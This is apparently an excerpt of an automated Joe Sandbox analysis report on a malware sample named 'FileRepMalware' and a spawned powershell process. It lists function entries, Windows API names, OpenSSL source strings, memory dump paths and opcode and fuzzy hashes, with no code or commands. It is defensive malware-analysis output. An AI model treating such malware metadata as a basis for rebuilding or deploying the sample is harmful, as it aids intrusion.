  • Part of subcall function 00007FF7B2B7A948: GetLastError.KERNEL32(?,?,?,00007FF7B2B82D22,?,?,?,00007FF7B2B82D5F,?,?,00000000,00007FF7B2B83225,?,?,?,00007FF7B2B83157), ref: 00007FF7B2B7A968
• GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7B2B6CBA5), ref: 00007FF7B2B79064
Strings
• C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe, xrefs: 00007FF7B2B79052
Memory Dump Source
• Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
• String ID: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
• API String ID: 3580290477-3624693095
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID: U
• API String ID: 442123175-4171548499
                                                                                                                                                                                                                                    • Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                    • Instruction ID: 53016007c94c5f92feb0fdf920e9baac73490a641f8e52ca4767f7eae9c23db6
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
• Instruction Fuzzy Hash: DA41B432719A4181EB61AF29E4443BAA760FBA9784F944135EF4D877A8FF7CD401C750
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2450811470.00007FFD93DAD000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD93D10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffd93d10000_SecuriteInfo.jbxd
Similarity
• API ID: 00007A5461170
• String ID: ..\s\crypto\x509v3\v3_utl.c$E
• API String ID: 1676360054-2813183830
• Opcode ID: 197d39180300df43221f1d0444a5c92c0b6f77bad688943df23ec613df87b6c6
• Instruction ID: 209d671a1911b255e868de8511b430b9a10c3238c178a8f69d91a48e1e4c45f9
• Instruction Fuzzy Hash: 56415E62B1EB4245EA38EFD2A43037A63A8AF45780F445635EE4D27B95DF3DE511C700
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2450811470.00007FFD93D11000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD93D10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffd93d10000_SecuriteInfo.jbxd
Similarity
• API ID: 00007
• String ID: ..\s\crypto\rand\randfile.c$Filename=
• API String ID: 3568877910-2201148535
• Opcode ID: ffb6a3000f1f43db175e07ee08783f9f81d8d84b3e7221bb60cce5b0c7cc5f2d
• Instruction ID: d24bb35021836859f81118b30781d401ea72219d3c5315537e1c55559a6a7956
• Instruction Fuzzy Hash: 9031DC61B0878682EA34EBD5E8742B96369FF86B84F404235EA1D27795EF3DE505C700
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: CurrentDirectory
• String ID: :
• API String ID: 1611563598-336475711
• Opcode ID: e8d367c4ea258391d160676196091cc4497c978f166048fd005a5cb1bdaac227
• Instruction ID: 5dc69d1594f78e5476cd8a2e3690d6d0e25bc9fca476ecdc8cf057dd842afb2e
• Instruction Fuzzy Hash: 21212562A0928181EB22BB1CD04426FB3B1FBA5B44FC54039DB4D432ACEFBCD944C760
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2450811470.00007FFD93D11000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD93D10000, based on PE: true
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd93d10000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorLastgetsockname
                                                                                                                                                                                                                                    • String ID: ..\s\crypto\bio\b_sock.c
                                                                                                                                                                                                                                    • API String ID: 566540725-540685895
                                                                                                                                                                                                                                    • Opcode ID: 3f7e4d637075843b50ffdfd6546d49ef448eefcf8eb4d6d42073b27a69ad320d
                                                                                                                                                                                                                                    • Instruction ID: 4988b494b319f47f2252e74d50d7407b83cbebaee0bda144bab7e58e644ccc59
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f7e4d637075843b50ffdfd6546d49ef448eefcf8eb4d6d42073b27a69ad320d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF218CB1B0810686EB209BE2D8206AE7368EF81304F805231E65C07A95DF3DE699DB40
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                    • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                    • Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                    • Instruction ID: ff432e68e2524181438430a90ae6f6fad9f07540786ada7cf2f339e97a492e80
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 58114C32609B8182EB229F29E40025AB7E4FB99B88F584234DB8D47768EF7CD551CB00
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                    • String ID: :
                                                                                                                                                                                                                                    • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                    • Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                    • Instruction ID: e24e7482a3a2e25d9e60ee98e9af8bb884b4093bc9117a16fcb0c71b8b16062f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D601882591D20285FB26BF68946627FA3A0EF66784FC00439D74D4A699FFACD504CB24
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2450811470.00007FFD93D11000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD93D10000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450428384.00007FFD93D10000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D1D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D75000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D89000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D9A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DA0000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DAD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F8A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FBB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FE1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD9402F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94035000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94037000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94053000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94060000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453865099.00007FFD94064000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453916688.00007FFD94066000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd93d10000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: 00007B22408
                                                                                                                                                                                                                                    • String ID: !$..\s\crypto\ct\ct_policy.c
                                                                                                                                                                                                                                    • API String ID: 4199793457-3401457818
                                                                                                                                                                                                                                    • Opcode ID: f8ad8f7d64f1f5fb2bc396660ebdd1b69d3ea8b5320bd96bda6debcd379a685e
                                                                                                                                                                                                                                    • Instruction ID: 45578cf42c5cb22f2b082f5a2b356bf48a83a5f404f1064d1e096d0ecddb55bb
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f8ad8f7d64f1f5fb2bc396660ebdd1b69d3ea8b5320bd96bda6debcd379a685e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43F0CD71F0620682EB249BE5D8213AD23A8FF41304F801134DA0D133C2EE3CEA56DB00
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2450811470.00007FFD93D11000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD93D10000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450428384.00007FFD93D10000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D1D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D75000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D89000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D9A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DA0000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DAD000.00000040.00000001.01000000.00000010.sdmpDownload File
• Associated: 00000002.00000002.2450811470.00007FFD93F5D000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD93F5F000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD93F8A000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD93FBB000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD93FE1000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD9402F000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD94035000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD94037000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD94053000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD94060000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2453865099.00007FFD94064000.00000080.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2453916688.00007FFD94066000.00000004.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffd93d10000_SecuriteInfo.jbxd
Similarity
• API ID: ErrorLastioctlsocket
• String ID: ..\s\crypto\bio\b_sock.c
• API String ID: 1021210092-540685895
• Opcode ID: 4461a209f28e95a1d17e1fe27fd0101058cda89b9424f7b2e88bf19f5e6d7981
• Instruction ID: 4a70a8e634675b7e8369a58e71a7ccd7a27a5606c6902144d2f17358d12fa84b
• Opcode Fuzzy Hash: 4461a209f28e95a1d17e1fe27fd0101058cda89b9424f7b2e88bf19f5e6d7981
• Instruction Fuzzy Hash: D6E06560B0860386F7315BE29874B7A2328EF05309F008230E91D97A92DE3DA2588A01
Strings
Memory Dump Source
• Source File: 00000051.00000002.2341184128.00007FFD33050000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33050000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_81_2_7ffd33050000_powershell.jbxd
Similarity
• API ID:
• String ID: H+3
• API String ID: 0-3111835228
• Opcode ID: b3776ad9546e42d6682f895b92c1608c8b2516e8ad14e9e7be5d99f81586bfa9
• Instruction ID: 70606214d682e6c2b416e0639af94858152b0d5bdcbcd11b9d5ebac8c0e011f6
• Opcode Fuzzy Hash: b3776ad9546e42d6682f895b92c1608c8b2516e8ad14e9e7be5d99f81586bfa9
• Instruction Fuzzy Hash: 11618F70E0DA488FEB55DF6CD8956ECBBF1EF59310F1441AED04DE7292CA25A842DB40
Memory Dump Source
• Source File: 00000051.00000002.2341691656.00007FFD33120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33120000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_81_2_7ffd33120000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 37b2309d708ac3405a048964d6f4ca91d9befd629637a2c221f39b6993030c0f
• Instruction ID: cd0b6988f0132fa7f6e485c925adf4e83aea32946f1c48b20ee12db5c6816c70
• Opcode Fuzzy Hash: 37b2309d708ac3405a048964d6f4ca91d9befd629637a2c221f39b6993030c0f
• Instruction Fuzzy Hash: 3241F723B0CE4A0FF7D9DA5C55612B973D2EFC5261B58017ED64EC3197EE18E8029281
Memory Dump Source
• Source File: 00000051.00000002.2341691656.00007FFD33120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33120000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_81_2_7ffd33120000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 622c90443fc6ccf9d871481b90bf32ddd158c446f92326c6a2236ba1fb697dc7
• Instruction ID: 436affda4fc59a5bb116bcfe421b96cf37b52e695c3c7390f9cc5032e8b58e7b
• Opcode Fuzzy Hash: 622c90443fc6ccf9d871481b90bf32ddd158c446f92326c6a2236ba1fb697dc7
• Instruction Fuzzy Hash: BF411833B0CA990FEBE9DA5C55612B9B3D2EF84390B5911BAD54ED3183EE19EC019381
Memory Dump Source
• Source File: 00000051.00000002.2341184128.00007FFD33050000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33050000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_81_2_7ffd33050000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
• Instruction ID: a9828f084e174248c858f820ae118333bf3a76b3179365d8430d37ee223451ce
• Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
• Instruction Fuzzy Hash: 3401677121CB0C4FDB44EF4CE451AA5B7E0FB95364F10056DE58AC3651D736E881CB45
Memory Dump Source
• Source File: 00000051.00000002.2341691656.00007FFD33120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33120000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_81_2_7ffd33120000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a45b11031a15182859334822a46c5daa9876727c5ecf818cf396754b8d2f7bfb
• Instruction ID: 6b3a94e74fd0711ddd151d6d4947119aa04245e618c5817dc14295d52e4c1c05
• Opcode Fuzzy Hash: a45b11031a15182859334822a46c5daa9876727c5ecf818cf396754b8d2f7bfb
• Instruction Fuzzy Hash: E2012663F0FADA0EFBA2A66918751A46AC0EF462A4B0801FAC54DE7093DC0C5C008341
Strings
Memory Dump Source
• Source File: 00000051.00000002.2341184128.00007FFD33050000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33050000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_81_2_7ffd33050000_powershell.jbxd
Similarity
• API ID:
• String ID: Y-3$0I-3$0Y-3$@Y-3$HZ-3$PY-3$XZ-3$^$hZ-3$xF-3$xZ-3$x]-3$F-3
• API String ID: 0-2808653681
• Opcode ID: e0fa8899a94fc297424ec3f8457728ad20fb418e69a36c96bdb531e16624b7e8
• Instruction ID: 51a25b9b283401172db6a556733202dda2d291309a4ca66082319fcc773925ab
• Opcode Fuzzy Hash: e0fa8899a94fc297424ec3f8457728ad20fb418e69a36c96bdb531e16624b7e8
• Instruction Fuzzy Hash: 6151E983B0FAD10BF35549DC7C252A99B90EF9126271801F7E2DDC61DBAC84AC4A63C5